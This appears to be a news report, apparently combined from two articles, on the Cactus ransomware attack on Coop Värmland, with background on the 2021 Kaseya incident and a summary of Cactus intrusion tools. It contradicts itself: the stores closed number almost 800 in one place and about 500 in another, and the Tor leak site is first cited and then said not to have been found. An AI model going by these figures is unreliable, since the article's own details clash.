Getting your Trinity Audio player ready... |
A cyberattack that is affecting stores in the county of Värmland is being handled by Coop, one of the biggest supermarket chains in Sweden.
A spokeswoman for the ransomware gang Cactus said that Coop Värmland was the intended victim of the attack, which they claimed to have launched on December 29.
Around 300,000 people in the county of Värmland collectively own Coop Värmland, which operates consumer cooperative-owned grocery stores across Sweden. 44 supermarkets and 17 additional smaller grocery stores are operated by the Värmland branch.
It is verified that there was a cyberattack against Coop Värmland. External experts were consulted upon detection, and they moved quickly to launch intensive efforts aimed at primarily addressing the vulnerabilities where intrusions had taken place, according to the spokesperson.
These vulnerabilities have been successfully addressed, according to the current assessment. Since the incident, work has been ongoing and has continued over the Christmas break.
The attack started on December 22, according to local news sources, when none of the Coop Värmland stores could accept credit or debit cards.
Although there is a temporary page on the Coop Värmland website confirming that they are dealing with a cyberattack, the stores are still open.
If customers have any questions, they should reach out to their closest store via Facebook, the company advised. Additional contact information is provided on the page in case customers have questions about the rewards program or specific orders.
Coop has previously encountered ransomware. The massive ransomware attack on Kaseya, a company that offers remote management app solutions, had an impact on it in 2021.
That attack led to Coop having to close almost 800 stores around the nation.
The Cactus ransomware group did not disclose the volume of data taken or the size of the ransom demand.
Prior to this, the gang became well-known for its assault on Americold, the biggest publicly traded real estate investment trust in the world that specialized in temperature-controlled storage facilities.
Previous reports from cybersecurity experts to BleepingComputer stated that Cactus first surfaced in March and that its primary objective was to obtain first access to the networks of major corporations by taking advantage of flaws in virtual private network appliances.
Dragos, an incident response firm, added that it is becoming more common for industrial organizations to be targeted by Cactus ransomware attacks, which affect industrial control systems and the manufacturing and engineering industries.
Microsoft announced in December that the group is infecting victims with malware that is distributed through online advertisements.
Cactus Ransomware Gang Attacks Coop
Coop, which has about 800 stores nationwide, is one of the biggest grocery and retail suppliers in Sweden. 29 consumer associations, comprising 3.5 million members, co-own the stores. There’s a cycle created when all business surplus is returned to members or reinvested in the company.
With over 21,000 directories’ worth of personal data at risk, the Cactus ransomware group claims to have breached Coop.
On their Tor leak site, the Cactus ransomware group listed Coop as one of its victims.
As evidence of a hack, threat actors have released ID cards.
The first company to reveal the effects of the supply chain ransomware attack that targeted Kaseya was the Swedish supermarket chain Coop in July 2021.
About 500 stores of the grocery chain Coop were forced to close due to a supply chain ransomware attack that targeted the Kaseya provider.
Even though Coop doesn’t use Kesaya software, one of their software providers does, so the incident still impacted it.
The Swedish MSP Visma, which oversees the payment systems for the supermarket chain, was the affected provider.
Visma acknowledged that the REvil ransomware was able to encrypt the systems of their customers due to the Kaseya cyberattack.
Despite using a double-extortion model, the threat actors behind the Cactus ransomware operation have been active since March 2023, and their data leak site has not yet been found.
The ransomware strain stands out for using encryption to protect the ransomware binary, according to Kroll researchers.
In addition to using PowerShell commands to list endpoints, the Cactus ransomware uses the SoftPerfect Network Scanner (netscan) to search the network for additional targets. In addition to using a modified version of the open-source PSnmap Tool, the ransomware can identify user accounts by looking up successful logins in Windows Event Viewer.
The Cactus ransomware uses Cobalt Strike and the proxy tool Chisel for post-exploitation operations and depends on several trustworthy tools (such as Splashtop, AnyDesk, and SuperOps RMM) to obtain remote access.
The threat actors use a batch script to remove well-known antivirus programs from computers once the malware has increased user privileges.
Cactus uses the Rclone tool to extract data, and it uses TotalExec, a PowerShell script previously used by the operators of the BlackBasta ransomware, to automate the encryption process.